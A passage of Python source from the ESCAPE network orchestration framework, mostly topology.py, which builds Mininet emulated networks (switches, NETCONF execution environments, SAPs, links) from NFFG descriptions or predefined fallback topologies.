nffg, repr.repr(virtualizer)))
```
#### File: escape/infr/topology.py
```python
from escape.infr import log, LAYER_NAME
from escape.nffg_lib.nffg import NFFG
from escape.nffg_lib.nffg_elements import NodeInfra
from escape.util.config import CONFIG
from escape.util.misc import quit_with_error, get_ifaces, remove_junks_at_boot
from mininet.link import TCLink, Intf
from mininet.net import VERSION as MNVERSION, Mininet, MininetWithControlNet
from mininet.node import RemoteController, RemoteSwitch
from mininet.term import makeTerms
from mininet.topo import Topo
class AbstractTopology(Topo):
"""
Abstract class for representing emulated topology.
Have the functions to build a ESCAPE-specific topology.
Can be used to define reusable topology similar to Mininet's high-level API.
Reusable, convenient and pre-defined way to define a topology, but less
flexible and powerful.
"""
# Default host options
default_host_opts = None
"""Default host options for Mininet"""
# Default switch options
default_switch_opts = None
"""Default switch options for Mininet"""
# Default link options
default_link_opts = None
"""Default link options for Mininet"""
# Default EE options
default_EE_opts = None
"""Default EE options for Mininet"""
# Type of the Topology class - NEED to be set
# The construction and build of the network is different for the STATIC and
# DYNAMIC way
TYPE = None
"""Type of the Topology class - NEED to be set"""
def __init__ (self, hopts=None, sopts=None, lopts=None, eopts=None):
"""
Init.
:param hopts: host options (optional)
:param sopts: switch options (optional)
:param lopts: link options (optional)
:param eopts: EE options (optional)
:return: None
"""
# Topo is Old-style class
Topo.__init__(self, hopts, sopts, lopts, eopts)
def construct (self, builder=None):
"""
Base class for construct the topology.
:param builder: optional builder object
"""
raise NotImplementedError
@staticmethod
def get_topo_desc ():
"""
Return the NFFG object represents the specific, constructed topology
:return: topology description
:rtype: :any`NFFG`
"""
raise NotImplementedError
class FallbackStaticTopology(AbstractTopology):
"""
Topology class for testing purposes and serve as a fallback topology.
Use the static way for topology compilation.
.. raw:: ascii
+----------+ +----------+
| | | |
| SW1 | | SW2 |
| | | |
+----------+ +----------+
|1 |1
1| 1|
+----------+ +----------+
| |2 2| |
| SW3 +-----------+ SW4 |
| | | |
+----------+ +----------+
|3 |3
1| 1|
+----+ +----+
|SAP1| |SAP2|
+----+ +----+
"""
TYPE = "STATIC"
def construct (self, builder=None):
"""
Assemble the topology description statically.
:param builder: optional builder object
:return: self
:rtype: :any:`FallbackStaticTopology`
"""
# nc1 = self.addEE(name='NC1', {})
# nc2 = self.addEE(name='NC2', {})
log.info("Start static topology creation...")
log.debug("Create Switch with name: SW1")
sw1 = self.addSwitch('SW1')
log.debug("Create Switch with name: SW2")
sw2 = self.addSwitch('SW2')
log.debug("Create Switch with name: SW3")
sw3 = self.addSwitch('SW3')
log.debug("Create Switch with name: SW4")
sw4 = self.addSwitch('SW4')
log.debug("Create SAP with name: SAP1")
sap1 = self.addHost('SAP1')
log.debug("Create SAP with name: SAP2")
sap2 = self.addHost('SAP2')
log.debug("Create Link SW3 <--> SW1")
self.addLink(sw3, sw1)
log.debug("Create Link SW4 <--> SW2")
self.addLink(sw4, sw2)
log.debug("Create Link SW3 <--> SW4")
self.addLink(sw3, sw4)
log.debug("Create Link SAP1 <--> SW3")
self.addLink(sap1, sw3)
log.debug("Create Link SAP2 <--> SW4")
self.addLink(sap2, sw4)
log.info("Static topology creation has been finished!")
return self
@staticmethod
def get_topo_desc ():
"""
Return the topology description.
:return: topo description
:rtype: :class:`NFFG`
"""
# Create NFFG
nffg = NFFG(id="STATIC-FALLBACK-TOPO", name="fallback-static")
# Add switches
sw1 = nffg.add_infra(id="sw1", name="SW1", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw2 = nffg.add_infra(id="sw2", name="SW2", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw3 = nffg.add_infra(id="sw3", name="SW3", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sw4 = nffg.add_infra(id="sw4", name="SW4", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW)
# Add SAPs
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
# Add links
nffg.add_link(sw1.add_port(1), sw3.add_port(1), id="l1")
nffg.add_link(sw2.add_port(1), sw4.add_port(1), id="l2")
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="l3")
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="l4")
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="l5")
# Duplicate one-way static links to become undirected in order to fit to
# the orchestration algorithm
# nffg.duplicate_static_links()
return nffg
class FallbackDynamicTopology(AbstractTopology):
"""
Topology class for testing purposes and serve as a fallback topology.
Use the dynamic way for topology compilation.
.. raw:: ascii
+----------+ +----------+
| | | |
| EE1 | | EE2 |
| | | |
+----------+ +----------+
|1 |1
1| 1|
+----------+ +----------+
| |2 2| |
| S3 +-----------+ S4 |
| | | |
+----------+ +----------+
|3 |3
1| 1|
+----+ +----+
|SAP1| |SAP2|
+----+ +----+
"""
TYPE = "DYNAMIC"
def construct (self, builder=None):
"""
Set a topology with NETCONF capability for mostly testing.
:param builder: builder object
:return: None
"""
log.info("Start dynamic topology creation...")
builder.create_Controller("ESCAPE")
agt1, nc_sw1 = builder.create_NETCONF_EE(name='NC1')
agt2, nc_sw2 = builder.create_NETCONF_EE(name='NC2')
sw3 = builder.create_Switch(name='SW3')
sw4 = builder.create_Switch(name='SW4')
sap1 = builder.create_SAP(name='SAP1')
sap2 = builder.create_SAP(name='SAP2')
builder.create_Link(sw3, nc_sw1)
builder.create_Link(sw4, nc_sw2)
builder.create_Link(sw3, sw4)
builder.create_Link(sap1, sw3)
builder.create_Link(sap2, sw4)
log.info("Dynamic topology creation has been finished!")
@staticmethod
def get_topo_desc ():
"""
Return the topology description.
:return: topo description
:rtype: :class:`NFFG`
"""
# Create NFFG
nffg = NFFG(id="DYNAMIC-FALLBACK-TOPO", name="fallback-dynamic")
# Add NETCONF capable containers a.k.a. Execution Environments
nc1 = nffg.add_infra(id="nc1", name="NC1", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc1.add_supported_type(['A', 'B'])
nc2.add_supported_type(['A', 'C'])
# Add inter-EE switches
sw3 = nffg.add_infra(id="sw3", name="SW3", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="sw4", name="SW4", domain="INTERNAL",
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
# Add links
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(nc1.add_port(1), sw3.add_port(1), id="l1", **linkres)
nffg.add_link(nc2.add_port(1), sw4.add_port(1), id="l2", **linkres)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="l3", **linkres)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="l4", **linkres)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="l5", **linkres)
# Duplicate one-way static links to become undirected in order to fit to
# the orchestration algorithm
# No need for that, ESCAPENetworkBridge do this later
# nffg.duplicate_static_links()
return nffg
class InternalControllerProxy(RemoteController):
"""
Controller class for emulated Mininet network. Making connection with
internal controller initiated by InternalPOXAdapter.
"""
def __init__ (self, name="InternalPOXController", ip='127.0.0.1', port=6653,
**kwargs):
"""
Init.
:param name: name of the controller (default: InternalPOXController)
:type name: str
:param ip: IP address (default: 127.0.0.1)
:type ip: str
:param port: port number (default 6633)
:type port: int
:return: None
"""
# Using old-style class because of MN's RemoteController class
RemoteController.__init__(self, name, ip, port, **kwargs)
def checkListening (self):
"""
Check the controller port is open.
"""
listening = self.cmd("echo A | telnet -e A %s %d" % (self.ip, self.port))
if 'Connected' not in listening:
log.debug(
"Unable to contact with internal controller at %s:%d. Waiting..." % (
self.ip, self.port))
class ESCAPENetworkBridge(object):
"""
Internal class for representing the emulated topology.
Represents a container class for network elements such as switches, nodes,
execution environments, links etc. Contains network management functions
similar to Mininet's mid-level API extended with ESCAPEv2 related capabilities
Separate the interface using internally from original Mininet object to
implement loose coupling and avoid changes caused by Mininet API changes
e.g. 2.1.0 -> 2.2.0.
Follows Bridge design pattern.
"""
def __init__ (self, network=None, topo_desc=None):
"""
Initialize Mininet implementation with proper attributes.
Use network as the hided Mininet topology if it's given.
:param topo_desc: static topology description e.g. the related NFFG
:type topo_desc: :class:`NFFG`
:param network: use this specific Mininet object for init (default: None)
:type network: :class:`mininet.net.MininetWithControlNet`
:return: None
"""
log.debug("Init ESCAPENetworkBridge with topo description: %s" % topo_desc)
if network is not None:
self.__mininet = network
else:
log.warning(
"Network implementation object is missing! Use Builder class instead "
"of direct initialization. Creating bare Mininet object anyway...")
self.__mininet = MininetWithControlNet()
# Topology description which is emulated by the Mininet
self.topo_desc = topo_desc
# Duplicate static links for ensure undirected neighbour relationship
if self.topo_desc is not None:
back_links = [l.id for u, v, l in
self.topo_desc.network.edges_iter(data=True) if
l.backward is True]
if len(back_links) == 0:
log.debug("No backward link has been detected! Duplicate STATIC links "
"to ensure undirected relationship for mapping...")
self.topo_desc.duplicate_static_links()
# Need to clean after shutdown
self._need_clean = None
# There is no such flag in the Mininet class so using this
self.started = False
self.xterms = []
@property
def network (self):
"""
Return the internal network representation.
:return: network representation
:rtype: :class:`mininet.net.MininetWithControlNet`
"""
return self.__mininet
def runXTerms (self):
"""
Start an xterm to every SAP if it's enabled in the global config. SAP are
stored as hosts in the Mininet class.
:return: None
"""
if CONFIG.get_SAP_xterms():
log.debug("Starting xterm on SAPS...")
terms = makeTerms(nodes=self.__mininet.hosts, title='SAP', term="xterm")
self.xterms.extend(terms)
else:
log.warning("Skip starting xterms on SAPS according to global config")
def start_network (self):
"""
Start network.
:return: None
"""
log.debug("Starting Mininet network...")
if self.__mininet is not None:
if not self.started:
try:
self.__mininet.start()
except SystemExit:
quit_with_error(msg="Mininet emulation requires root privileges!",
logger=LAYER_NAME)
except KeyboardInterrupt:
quit_with_error(
msg="Initiation of Mininet network was interrupted by user!",
logger=log)
self.started = True
log.debug("Mininet network has been started!")
self.runXTerms()
else:
log.warning(
"Mininet network has already started! Skipping start task...")
else:
log.error("Missing topology! Skipping emulation...")
def stop_network (self):
"""
Stop network.
:return: None
"""
log.debug("Shutting down Mininet network...")
if self.__mininet is not None:
if self.started:
self.__mininet.stop()
self.started = False
log.debug("Mininet network has been stopped!")
else:
log.warning("Mininet network is not started yet! Skipping stop task...")
if self._need_clean:
self.cleanup()
def cleanup (self):
"""
Clean up junk which might be left over from old runs.
..seealso::
:func:`mininet.clean.cleanup() <mininet.clean.cleanup>`
"""
if self.started:
log.warning(
"Mininet network is not stopped yet! Skipping cleanup task...")
else:
log.info("Schedule cleanup task after Mininet emulation...")
# Kill remained xterms
log.debug("Close SAP xterms...")
import os
import signal
for term in self.xterms:
os.killpg(term.pid, signal.SIGTERM)
# Schedule a cleanup as a coop task to avoid threading issues
from escape.util.misc import remove_junks_at_shutdown
# call_as_coop_task(remove_junks, log=log)
# threading.Thread(target=remove_junks, name="cleanup", args=(log,
# )).start()
# multiprocessing.Process(target=remove_junks, name="cleanup",
# args=(log,)).start()
remove_junks_at_shutdown(log=log)
def get_agent_to_switch (self, switch_name):
"""
Return the agent to which the given switch is tided..
:param switch_name: name of the switch
:type switch_name: str
:return: the agent
:rtype: :class:`mininet.node.NetconfAgent`
"""
for switch in self.__mininet.switches:
if switch.name == switch_name:
return switch.agent
return None
class TopologyBuilderException(Exception):
"""
Exception class for topology errors.
"""
pass
class ESCAPENetworkBuilder(object):
"""
Builder class for topology.
Update the network object based on the parameters if it's given or create
an empty instance.
Always return with an ESCAPENetworkBridge instance which offer a generic
interface for created :class:`mininet.net.Mininet` object and hide
implementation's nature.
Follows Builder design pattern.
"""
# Default initial options for Mininet
default_opts = {
"controller": InternalControllerProxy,
# Use own Controller
'build': False, # Not build during init
'inNamespace': False, # Not start element in namespace
'autoSetMacs': False, # Set simple MACs
'autoStaticArp': True, # Set static ARP entries
'listenPort': None, # Add listen port to OVS switches
'link': TCLink} # Add default link
"""Default initial options for Mininet"""
# Default internal storing format for NFFG parsing/reading from file
DEFAULT_NFFG_FORMAT = "NFFG"
"""Default internal storing format for NFFG parsing/reading from file"""
# Constants
TYPE_EE_LOCAL = "LOCAL"
TYPE_EE_REMOTE = "REMOTE"
# Constants for DPID generation
dpidBase = 1 # Switches start with port 1 in OpenFlow
dpidLen = 16 # digits in dpid passed to switch
def __init__ (self, net=None, opts=None, fallback=True, run_dry=True):
"""
Initialize NetworkBuilder.
If the topology definition is not found, an exception will be raised or
an empty :class:`mininet.net.Mininet` topology will be created if
``run_dry`` is set.
:param net: update given Mininet object instead of creating a new one
:type net: :class:`mininet.net.Mininet`
:param opts: update default options with the given opts
:type opts: dict
:param fallback: search for fallback topology (default: True)
:type fallback: bool
:param run_dry: do not raise an Exception and return with bare Mininet obj.
:type run_dry: bool
:return: None
"""
self.opts = dict(self.default_opts)
if opts is not None:
self.opts.update(opts)
self.fallback = fallback
self.run_dry = run_dry
if net is not None:
if isinstance(net, Mininet):
# Initial settings - Create new Mininet object if necessary
self.mn = net
else:
raise TopologyBuilderException(
"Network object's type must be a derived class of Mininet!")
else:
# self.mn = Mininet(**self.opts)
try:
self.mn = MininetWithControlNet(**self.opts)
except KeyboardInterrupt:
quit_with_error(
msg="Assembly of Mininet network was interrupted by user!",
logger=log)
# Basically a wrapper for mn to offer helping functions
self.mn_bridge = None
# Cache of the topology description as an NFFG which is parsed during
# initialization
self.topo_desc = None
self.__dpid_cntr = self.dpidBase
def __get_new_dpid (self):
"""
Generate a new DPID and return the valid format for Mininet/OVS.
:return: new DPID
:rtype: str
"""
dpid = hex(int(self.__dpid_cntr))[2:]
dpid = '0' * (self.dpidLen - len(dpid)) + dpid
self.__dpid_cntr += 1
return dpid
##############################################################################
# Topology initializer functions
##############################################################################
def __init_from_NFFG (self, nffg):
"""
Initialize topology from an :class:`NFFG` representation.
:param nffg: topology object structure
:type nffg: :class:`NFFG`
:return: None
"""
# pprint(nffg.network.__dict__)
log.info("Start topology creation from NFFG(name: %s)..." % nffg.name)
created_mn_nodes = {} # created nodes as 'NFFG-id': <node>
created_mn_links = {} # created links as 'NFFG-id': <link>
# If not set then cache the given NFFG as the topology description
self.topo_desc = nffg
# Create a Controller which will be the default internal POX controller
try:
self.create_Controller("ESCAPE")
except SystemExit:
raise TopologyBuilderException("Controller creations was unsuccessful!")
# Convert INFRAs
for infra in nffg.infras:
# Create EE
if infra.infra_type == NodeInfra.TYPE_EE:
if infra.domain == "INTERNAL":
ee_type = self.TYPE_EE_LOCAL
else:
log.warning(
"Detected domain of infra: %s is not INTERNAL! Remote EE creation "
"for domains other than INTERNAL is not supported yet!" % infra)
# ee_type = self.TYPE_EE_REMOTE
ee_type = self.TYPE_EE_LOCAL
# FIXME - set resource info in MN EE if can - cpu,mem,delay,bandwidth?
agt, sw = self.create_NETCONF_EE(name=infra.id, type=ee_type)
created_mn_nodes[infra.id] = sw
# Create Switch
elif infra.infra_type == NodeInfra.TYPE_SDN_SWITCH:
switch = self.create_Switch(name=infra.id)
created_mn_nodes[infra.id] = switch
elif infra.infra_type == NodeInfra.TYPE_STATIC_EE:
static_ee = self.create_static_EE(name=infra.id)
created_mn_nodes[infra.id] = static_ee
else:
quit_with_error(
msg="Type: %s in %s is not supported by the topology creation "
"process in %s!" % (
infra.infra_type, infra, self.__class__.__name__), logger=log)
# Create SAPs - skip the temporary, inter-domain SAPs
for sap in {s for s in nffg.saps if not s.binding}:
# Create SAP
sap_host = self.create_SAP(name=sap.id)
created_mn_nodes[sap.id] = sap_host
# Convert VNFs
# TODO - implement --> currently the default Mininet topology does not
# TODO contain NFs but it could be possible
# Convert connections - copy link ref in a list and iter over it
for edge in [l for l in nffg.links]:
# Skip initiation of links which connected to an inter-domain SAP
if (edge.src.node.type == NFFG.TYPE_SAP and
edge.src.node.binding is not None) or (
edge.dst.node.type == NFFG.TYPE_SAP and
edge.dst.node.binding is not None):
continue
# Create Links
mn_src_node = created_mn_nodes.get(edge.src.node.id)
mn_dst_node = created_mn_nodes.get(edge.dst.node.id)
if mn_src_node is None or mn_dst_node is None:
raise TopologyBuilderException(
"Created topology node is missing! Something really went wrong!")
src_port = int(edge.src.id) if int(edge.src.id) < 65535 else None
if src_port is None:
log.warning(
"Source port id of Link: %s is generated dynamically! Using "
"automatic port assignment based on internal Mininet "
"implementation!" % edge)
dst_port = int(edge.dst.id) if int(edge.dst.id) < 65535 else None
if dst_port is None:
log.warning(
"Destination port id of Link: %s is generated dynamically! Using "
"automatic port assignment based on internal Mininet "
"implementation!" % edge)
link = self.create_Link(src=mn_src_node, src_port=src_port,
dst=mn_dst_node, dst_port=dst_port,
bw=edge.bandwidth, delay=str(edge.delay) + 'ms')
created_mn_links[edge.id] = link
# Set port properties of SAP nodes.
# A possible excerpt from a escape-mn-topo.nffg file:
# "ports": [{ "id": 1,
# "property": ["ip:10.0.10.1/24"] }]
#
for n in {s for s in nffg.saps if not s.binding}:
mn_node = self.mn.getNodeByName(n.id)
for port in n.ports:
# ip should be something like '10.0.123.1/24'.
if len(port.l3):
if len(port.l3) == 1:
ip = port.l3.container[0].provided
else:
log.warning(
"Multiple L3 address is detected! Skip explicit IP address "
"definition...")
ip = None
else:
# or None
ip = port.get_property('ip')
if port.l2:
mac = port.l2
else:
mac = port.get_property('mac')
intf = mn_node.intfs.get(port.id)
if intf is None:
log.warn(("Port %s of node %s is not connected,"
"it will remain unconfigured!") % (port.id, n.name))
continue
if intf == mn_node.defaultIntf():
# Workaround a bug in Mininet
mn_node.params.update({'ip': ip})
mn_node.params.update({'mac': mac})
if ip is not None:
mn_node.setIP(ip, intf=intf)
log.debug("Use explicit IP: %s for node: %s" % (ip, n))
if mac is not None:
mn_node.setMAC(mac, intf=intf)
log.debug("Use explicit MAC: %s for node: %s" % (mac, n))
# For inter-domain SAPs no need to create host/xterm just add the SAP as
# a port to the border Node
# Iterate inter-domain SAPs
self.bind_inter_domain_SAPs(nffg=nffg)
log.info("Topology creation from NFFG has been finished!")
def __init_from_AbstractTopology (self, topo_class):
"""
Build topology from pre-defined Topology class.
:param topo_class: topology
:type topo_class: :any:`AbstractTopology`
:return: None
"""
log.info("Load topology from class: %s" % topo_class.__name__)
if topo_class.TYPE == "STATIC":
self.mn.topo = topo_class().construct()
self.mn.build()
elif topo_class.TYPE == "DYNAMIC":
# self.mn = topo_class().construct()
topo_class().construct(builder=self)
else:
raise TopologyBuilderException(
"TYPE field of the Topology class need to be set!")
self.topo_desc = topo_class.get_topo_desc()
def __init_from_CONFIG (self, format=DEFAULT_NFFG_FORMAT):
"""
Build a pre-defined topology from an NFFG stored in a file.
The file path is searched in CONFIG with tha name ``TOPO``.
:param format: NF-FG storing format (default: internal NFFG representation)
:type format: str
:return: None
"""
path = CONFIG.get_mininet_topology()
if path is None:
raise TopologyBuilderException("Missing Topology!")
self.__init_from_file(path=path, format=format)
def __init_from_file (self, path, format=DEFAULT_NFFG_FORMAT):
"""
Build a pre-defined topology from an NFFG stored in a file.
The file path is searched in CONFIG with tha name ``TOPO``.
:param path: file path
:type path: str
:param format: NF-FG storing format (default: internal NFFG representation)
:type format: str
:return: None
"""
if path is None:
log.error("Missing file path of Topology description")
return
try:
with open(path) as f:
log.info("Load topology from file: %s" % path)
if format == self.DEFAULT_NFFG_FORMAT:
log.debug("Using file format: %s" % format)
self.__init_from_NFFG(nffg=NFFG.parse(f.read()))
else:
raise TopologyBuilderException("Unsupported file format: %s!" %
format)
except IOError:
log.warning("Additional topology file not found: %s" % path)
raise TopologyBuilderException("Missing topology file!")
except ValueError as e:
log.error("An error occurred when load topology from file: %s" %
e.message)
raise TopologyBuilderException("File parsing error!")
# except SystemExit:
# raise TopologyBuilderException("Got exit exception from Mininet!")
def get_network (self):
"""
Return the bridge to the constructed network.
:return: object representing the emulated network
:rtype: :any:`ESCAPENetworkBridge`
"""
if self.mn_bridge is None:
# Create the Interface object and set the topology description as the
# original NFFG
self.mn_bridge = ESCAPENetworkBridge(network=self.mn,
topo_desc=self.topo_desc)
# Additional settings
self.mn_bridge._need_clean = CONFIG.get_clean_after_shutdown()
return self.mn_bridge
##############################################################################
# Builder functions
##############################################################################
def create_static_EE (self, name, cls=None, **params):
"""
Create and add a new EE to Mininet in the static way.
This function is for only backward compatibility.
.. warning::
Not tested yet!
:param name: name of the Execution Environment
:type name: str
:param cls: custom EE class/constructor (optional)
:type cls: :class:`mininet.node.EE`
:param cores: Specify (real) cores that our cgroup can run on (optional)
:type cores: list
:param frac: Set overall CPU fraction for this EE (optional)
:type frac: list
:param vlanif: set vlan interfaces (optional)
:type vlanif: list
:return: newly created EE object
:rtype: :class:`mininet.node.EE`
"""
# create static EE
cfg = CONFIG.get_EE_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
log.debug("Create static EE with name: %s" % name)
ee = self.mn.addEE(name=name, cls=cls, **cfg)
if 'cores' in cfg:
ee.setCPUs(**cfg['cores'])
if 'frac' in cfg:
ee.setCPUFrac(**cfg['frac'])
if 'vlanif' in cfg:
for vif in cfg['vlaninf']:
ee.cmdPrint('vconfig add ' + name + '-eth0 ' + vif[1])
ee.cmdPrint('ifconfig ' + name + '-eth0.' + vif[1] + ' ' + vif[0])
return ee
def create_NETCONF_EE (self, name, type=TYPE_EE_LOCAL, **params):
"""
Create and add a new EE to Mininet network.
The type of EE can be {local|remote} NETCONF-based.
:param name: name of the EE: switch: name, agent: agt_+'name'
:type name: str
:param type: type of EE {local|remote}
:type type: str
:param opts: additional options for the switch in EE
:type opts: str
:param dpid: remote switch DPID (remote only)
:param username: NETCONF username (remote only)
:param passwd: NETCONF password (remote only)
:param ip: control Interface for the agent (optional)
:param agentPort: port to listen on for NETCONF connections, (else set \
automatically)
:param minPort: first VNF control port which can be used (else set \
automatically)
:param cPort: number of VNF control ports (and VNFs) which can be used ( \
default: 10)
:return: tuple of newly created :class:`mininet.node.Agent` and \
:class:`mininet.node.Switch` object
:rtype: tuple
"""
type = type.upper()
cfg = CONFIG.get_EE_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
if type == self.TYPE_EE_LOCAL:
# create local NETCONF-based
log.debug("Create local NETCONF EE with name: %s" % name)
sw = self.mn.addSwitch(name, **cfg)
elif type == self.TYPE_EE_REMOTE:
# create remote NETCONF-based
log.debug("Create remote NETCONF EE with name: %s" % name)
cfg["inNamespace"] = False
sw = self.mn.addRemoteSwitch(name, cls=None, **cfg)
else:
raise TopologyBuilderException(
"Unsupported NETCONF-based EE type: %s!" % type)
agt = self.mn.addAgent('agt_' + name, cls=None, **cfg)
agt.setSwitch(sw)
return agt, sw
def create_Switch (self, name, cls=None, **params):
"""
Create and add a new OF switch instance to Mininet network.
Additional parameters are keyword arguments depend on and forwarded to
the initiated Switch class type.
:param name: name of switch
:type name: str
:param cls: custom switch class/constructor (optional)
:type cls: :class:`mininet.node.Switch`
:param dpid: DPID for switch (default: derived from name)
:type dpid: str
:param opts: additional switch options
:type opts: str
:param listenPort: custom listening port (optional)
:type listenPort: int
:param inNamespace: override the switch spawn in namespace (optional)
:type inNamespace: bool
:param of_ver: override OpenFlow version (optional)
:type of_ver: int
:param ip: set IP address for the switch (optional)
:type ip:
:return: newly created Switch object
:rtype: :class:`mininet.node.Switch`
"""
log.debug("Create Switch with name: %s" % name)
cfg = CONFIG.get_Switch_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
sw = self.mn.addSwitch(name=name, cls=cls, **cfg)
if 'of_ver' in cfg:
sw.setOpenFlowVersion(cfg['of_ver'])
if 'ip' in cfg:
sw.setSwitchIP(cfg['ip'])
return sw
def create_Controller (self, name, controller=None, **params):
"""
Create and add a new OF controller to Mininet network.
Additional parameters are keyword arguments depend on and forwarded to
the initiated Controller class type.
.. warning::
Should not call this function and use the default InternalControllerProxy!
:param name: name of controller
:type name: str
:param controller: custom controller class/constructor (optional)
:type controller: :class:`mininet.node.Controller`
:param inNamespace: override the controller spawn in namespace (optional)
:type inNamespace: bool
:return: newly created Controller object
:rtype: :class:`mininet.node.Controller`
"""
log.debug("Create Controller with name: %s" % name)
cfg = CONFIG.get_Controller_params()
cfg.update(params)
return self.mn.addController(name=name, controller=controller, **cfg)
def create_SAP (self, name, cls=None, **params):
"""
Create and add a new SAP to Mininet network.
Additional parameters are keyword arguments depend on and forwarded to
the initiated Host class type.
:param name: name of SAP
:type name: str
:param cls: custom hosts class/constructor (optional)
:type cls: :class:`mininet.node.Host`
:return: newly created Host object as the SAP
:rtype: :class:`mininet.node.Host`
"""
log.debug("Create SAP with name: %s" % name)
cfg = CONFIG.get_SAP_params()
cfg.update(params)
return self.mn.addHost(name=name, cls=cls, **cfg)
def bind_inter_domain_SAPs (self, nffg):
"""
Search for inter-domain SAPs in given :class:`NFFG`, create them as a
switch port and bind them to a physical interface given in sap.domain
attribute.
:param nffg: topology description
:type nffg: :class:`NFFG`
:return: None
"""
log.debug("Search for inter-domain SAPs...")
# Create the inter-domain SAP ports
for sap in {s for s in nffg.saps if s.binding is not None}:
# NFFG is the raw NFFG without link duplication --> iterate over every
# edges in or out there should be only one link in this case
# e = (u, v, data)
sap_switch_links = [e for e in
nffg.network.edges_iter(data=True) if sap.id in e]
try:
if sap_switch_links[0][0] == sap.id:
border_node = sap_switch_links[0][1]
else:
border_node = sap_switch_links[0][0]
except IndexError:
log.error("Link for inter-domain SAP: %s is not found. "
"Skip SAP creation..." % sap)
continue
log.debug("Detected inter-domain SAP: %s connected to border Node: %s" %
(sap, border_node))
# if sap.delay or sap.bandwidth:
# log.debug("Detected resource values for inter-domain connection: "
# "delay: %s, bandwidth: %s" % (sap.delay, sap.bandwidth))
sw_name = nffg.network.node[border_node].id
for sw in self.mn.switches:
# print sw.name
if sw.name == sw_name:
if sap.binding not in get_ifaces():
log.warning(
"Physical interface: %s is not found! Skip binding..."
% sap.binding)
continue
log.debug("Add physical port as inter-domain SAP: %s -> %s" %
(sap.binding, sap.id))
# Add interface to border switch in Mininet
# os.system('ovs-vsctl add-port %s %s' % (sw_name, sap.domain))
sw.addIntf(intf=Intf(name=sap.binding, node=sw))
def create_Link (self, src, dst, src_port=None, dst_port=None, **params):
"""
Create an undirected connection between src and dst.
Source and destination ports can be given optionally:
:param src: source Node
:param dst: destination Node
:param src_port: source Port (optional)
:param dst_port: destination Port (optional)
:param params: additional link parameters
:return: None
"""
log.debug("Create Link %s%s <--> %s%s" % (
src, ":%s" % src_port if src_port is not None else "", dst,
":%s" % dst_port if dst_port is not None else ""))
remote = filter(lambda n: isinstance(n, RemoteSwitch), [src, dst])
local = filter(lambda n: not isinstance(n, RemoteSwitch), [src, dst])
cfg = CONFIG.get_Link_params()
cfg.update(params)
if not remote:
self.mn.addLink(src, dst, src_port, dst_port, **cfg)
else:
# sw = local[0] # one of the local Node
# r = remote[0] # other Node which is the remote
# intfName = r.params['local_intf_name']
# r_mac = None # unknown, r.params['remote_mac']
# r_port = r.params['remote_port']
# # self._debug('\tadd hw interface (%s) to node (%s)' % (intfName,
# # sw.name))
# # This hack avoids calling __init__ which always makeIntfPair()
# link = Link.__new__(Link)
# i1 = Intf(intfName, node=sw, link=link)
# i2 = Intf(intfName, node=r, mac=r_mac, port=r_port, link=link)
# i2.mac = r_mac # mn runs 'ifconfig', which resets mac to None
# link.intf1, link.intf2 = i1, i2
raise TopologyBuilderException(
"Remote Link creation is not supported yet!")
def build (self, topo=None):
"""
Initialize network.
1. If the additional ``topology`` is given then using that for init.
2. If TOPO is not given, search topology description in CONFIG with the \
name 'TOPO'.
3. If TOPO not found or an Exception was raised, search for the fallback \
topo with the name ``FALLBACK-TOPO``.
4. If FALLBACK-TOPO not found raise an exception or run a bare Mininet \
object if the run_dry attribute is set
:param topo: optional topology representation
:type topo: :class:`NFFG` or :any:`AbstractTopology` or ``None``
:return: object representing the emulated network
:rtype: :any:`ESCAPENetworkBridge`
"""
log.debug("Init emulated topology based on Mininet v%s" % MNVERSION)
remove_junks_at_boot(log=log)
# Load topology
try:
if topo is None:
log.debug("Get Topology description from CONFIG...")
self.__init_from_CONFIG()
elif isinstance(topo, NFFG):
log.debug("Get Topology description from given NFFG...")
self.__init_from_NFFG(nffg=topo)
elif isinstance(topo, basestring) and topo.startswith('/'):
log.debug("Get Topology description from given file...")
self.__init_from_file(path=topo)
elif isinstance(topo, AbstractTopology):
log.debug("Get Topology description based on Topology class...")
self.__init_from_AbstractTopology(topo_class=topo)
else:
raise TopologyBuilderException(
"Unsupported topology format: %s - %s" % (type(topo), topo))
return self.get_network()
except SystemExit as e:
quit_with_error(msg="Mininet exited unexpectedly!", logger=log,
exception=e)
except TopologyBuilderException:
try:
if self.fallback:
# Search for fallback topology
fallback = CONFIG.get_fallback_topology()
if fallback:
log.info("Load topo from fallback topology description...")
self.__init_from_AbstractTopology(fallback)
return self.get_network()
except SystemExit as e:
quit_with_error(msg="Mininet exited unexpectedly!", logger=log,
exception=e)
# fallback topo is not found or set
if self.run_dry:
# Return with the bare Mininet object
log.warning("Topology description is not found! Running dry...")
return self.get_network()
else:
# Re-raise the exception
raise
except KeyboardInterrupt:
quit_with_error(
msg="Assembly of Mininet network was interrupted by user!",
logger=log)
```
#### File: escape/infr/topo_manager.py
```python
import pprint
import re
from ncclient import NCClientError
from ncclient.operations import OperationError
from ncclient.operations.rpc import RPCError
from ncclient.transport import TransportError
